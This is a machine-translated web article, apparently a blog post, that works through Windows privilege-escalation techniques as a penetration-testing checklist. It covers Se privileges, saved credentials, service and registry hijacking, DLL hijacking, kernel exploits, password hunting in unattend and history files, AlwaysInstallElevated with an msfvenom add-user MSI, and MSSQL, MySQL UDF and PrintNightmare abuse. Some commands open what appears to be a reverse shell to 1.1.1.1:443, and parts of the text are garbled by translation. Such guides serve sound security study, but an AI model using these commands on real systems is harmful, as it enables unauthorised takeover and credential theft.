Location>code7788 >text

Windows License Elevation Guide

Popularity:756 ℃/2025-04-24 12:59:16

If a man fulfills his life's ambition, he will read the Five Classics to the window frequently.

navigation

  • One - Se Privileges

  • 2 - RunAs

  • 3 - Weak Service

  • Small - Windows kernel

  • Wu - Password Search

  • Lu - Miscellaneous

    • AlwaysInstallElevated
    • Power on and start

  • Seven - Service Program

    • MSSQL
    • MySQL UDF
    • PrintNightmare
    • Unsafe GUI programs

  • 8 - Automation Tools

One - Se Privileges

  1. Check if the current user has an interestedSe Privileges, such as SeImpersonatePrivilege/SeAssignPrimaryPrivilege, SeBackupPrivilege, SeRestorePrivilege/SeTakeOwnershipPrivilege, etc. 【Orderwhoami /priv
  2. If you haveSeImpersonatePrivilegePrivileges, then the potatoes are escalated. 【Utilization method
  3. If you haveSeBackupPrivilegeFor privilege, you need to first perform SAM/SYSTEM file extraction, and then start PTH attack to escalate privileges. 【Utilization method
  4. As for the available features possessed by other privileges, it can be used according tostorehouseThe content is studied and explored.

2 - RunAs

  1. Check if the current environment has anyStored credentials. 【Ordercmdkey /list
  2. likeDiscover the voucher, then it can be usedrunas /env /noprofile /savecred /user:admin "c:\temp\ 1.1.1.1 443 -e "to perform permission movement.
  3. If you obtain it through the password search belowUser password information, you can refer to thisarticlePermission move.

3 - Weak Service

  1. The enumeration of weak services is best done through toolsPowerUpandwinPEASAutomatic analysis is more cumbersome. Weak service categories are as follows:
  2. weakServePermissions: The user has modification permissions to the service itself, so the service's startup program path or service startup identity can be modified through the sc command. 【Ordersc config Juggernaut binPath= "C:\temp\ 1.1.1.1 443 -e C:\windows\system32\" 】【More details
  3. weakRegistration formPermissions: The user has write permission to the registry corresponding to the service, so the reg command can be used.Indirect modificationThe service start program path or the service starts identity action. 【Orderreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Juggernaut" /v ImagePath /t REG_EXPAND_SZ /d "C:\temp\" /f】【More details
  4. weakFile/DirectoryPermissions: The user has write permissions to the directory where the service starter is located, so the starter can be replaced. 【More details
  5. Not citedService path: (1) The absolute path of the service startup program has spaces and is not wrapped in double quotes, triggering the system toPath priorityFind executable files layer by layer. (2) In the path of layer-by-layer search, the user has write permissions to one of the directories. (3) Write a directory accordinglyCorresponding namemalicious programs. 【More details
  6. DLLHijacking: Similar to "weak"File/DirectoryLike replacing the service initiator in Permissions, DLL hijacking will directly replace or indirectly hijack the DLL file loaded by the service initiator.
    1. Direct replacementThe user is required to have write permissions to the directory where the service starts the program is located. [Note: Since this is the case, why not replace the startup program directly][More details
    2. Indirect hijackingIt is necessary to analyze which DLLs will be loaded when the service starts, and at the same time, it is necessary toDLL Standard Search DirectoryOne of them has write permissions. [Note: This is only effective for known general services] [More details
    3. Some repositories that use system DLL loading to attack:
      1. /xct/diaghub
      2. /itm4n/UsoDllLoader
      3. /sailay1996/WerTrigger

Note: Before utilizing the service, first know whether you have the ability to trigger the service to restart (restart the service [sc start *], restart the computer), otherwise it will be useless if you do it.

Small - Windows kernel

  1. Check the OS version information and confirm the old and new versions of Windows. 【Ordersysteminfo

  2. Windows XP/7/Server 2008/Server 2012/Other older versionsThey are all called old versions of Windows. Older Windows systems can hand over content to automatic toolswesngandWindows Exploit Suggester 2Go offline analysis, or use it on the victim machinesherlock.ps1To analyze the script, the intersecting vulnerabilities in the analysis results can be given priority. 【More details

  3. Windows 10/Server 2016/Server 2019/ Other updatesThey are all called new versions of Windows. New version of Windows system recommends using automatic toolswinPEASDelete local analytics of victims, or through kali built-in toolsSearchsploitGo offline and search manually. 【More details

  4. High-quality kernel vulnerability exploitationrecommend

    1. PrintNightmare: Almost all supported versions of Windows.
    2. cve_2022_21882_win32k【MSF also supports】: almost all versions of Win10.
    3. Other compiled kernel vulnerabilities

Note: Among the many exploits of Windows kernel vulnerabilities, some of them need to be used normally in the GUI environment, and special attention should be paid to this.

Wu - Password Search

  1. Common paths for unattended files are as follows:
    1. C:\
    2. C:\Windows\Panther\
    3. C:\Windows\Panther\Unattend\
    4. C:\Windows\system32\
    5. C:\Windows\system32\sysprep\
  2. In the user's directory*.* document . 【Orderdir /s /b c:\users\ | findstr .*\..*
  3. PowerShell History Files
    1. type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    2. cat (Get-PSReadlineOption).HistorySavePath
  4. IIS configuration and web files
    1. Get-Childitem -Recurse C:\inetpub | findstr -i "directory config txt aspx ps1 bat xml pass user", file, or similar config file in the result.
    2. Except for the default use of IISC:\inetpubIn addition to the directory, there are also these directories worth noting:C:\apacheC:\nginxC:\xamppC:\wamp
  5. If you can log in to the SQL database, go throughSystem built-in library/user built-in libraryAccount password in the user table.

Lu - Miscellaneous

1、AlwaysInstallElevated

  1. Check whether the AlwaysInstallElevated function is enabled. 【A value of 1 means that the function is enabled】

    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

  2. Making loadmsfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/

2. Start the computer automatically

  1. Self-start application-Catalog:icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"[When you have write permission, just put the program or bat in it. 】
  2. Self-start application-registration:reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"[(1) When you have registry writing permission, you can create a new key under this key; (2) Observe the program path of the subkey and see if it existsWeak directory permissionsorThe program path is not referencedThe problem. 】

Note: The other keys RunOnce, R, Runex, and Runonceex in the above registry path under the same path as Run are also worth paying attention to. After the program in the RunOnce subkey is executed once, the subkey is deleted.

Seven - Service Program

Before this, first pass the command netstat -anop tcp | LISTENINGDetermine which services are running in this system may be of interest to us.

1、MSSQL

  1. Utilization scenario 1: (1) Have a database login account and can execute the xp_dirtree command. (2) Try to capture the NetNTLMv2 hash value of the MSSQL service account through the response to cracking. 【Utilization method
  2. Utilization scenario 2: (1) Have a database administrator account sa. (2) A shell reverse connection to obtain service account permissions through the xp_cmdshell directive. 【Utilization method
  3. Notice: (1) Any MSSQL database account obtained is worth trying to try whether you have permission to execute xp_dirtree and xp_cmdshell instructions, because the problem of intricate permission allocation occurs from time to time. (2) Any service account may have more Se privileges than ordinary accounts, so there will be more breakthrough points, so any service account may have unexpected surprises.

2、MySQL UDF

  1. Utilization conditions: (1) The mysqld process runs as administrator or SYSTEM. (2) A database login account with high authority, such as root. (3) The mysql version complies with //[?]. 【Ordermysql -V
  2. Utilization method:Reference link 1Reference link 2
  3. Getting method: command ``searchsploit mysql udf`, id1518.

3、PrintNightmare

  1. Utilization scenario 1-RCE: (1) Have a standard user credential. (2) Remote enumeration The Print Spooler service is running. 【Order @1.1.1.1 | egrep 'MS-RPRN|MS-PAR'】【Utilization method
  2. Utilizing Scenario 2-LPE: Locally check that the Print Spooler service is running. 【Ordersc query Spooler 】【Utilization method

4. Unsafe GUI Programs

  1. Utilization conditions: (1) The GUI interactive interface has been obtained. (2) Search for programs that run with high auto-elevated permissions by default.
  2. Recommended programs worth trying:
    4. Control Panel - Troubleshooting - Help and Support - Opens a Command Prompt window. 【Win7 has this function before, win0 has been removed. 】

Note: These programs may not be able to successfully raise power, but they have another function that they can perform UAC bypassing. Although it's a waste of money, this technique is worth keeping.

8 - Automation Tools

  1. PEASS-ng
  2. PowerUp
  3. Seatbelt
  4. PrivescCheck
<Previous Next>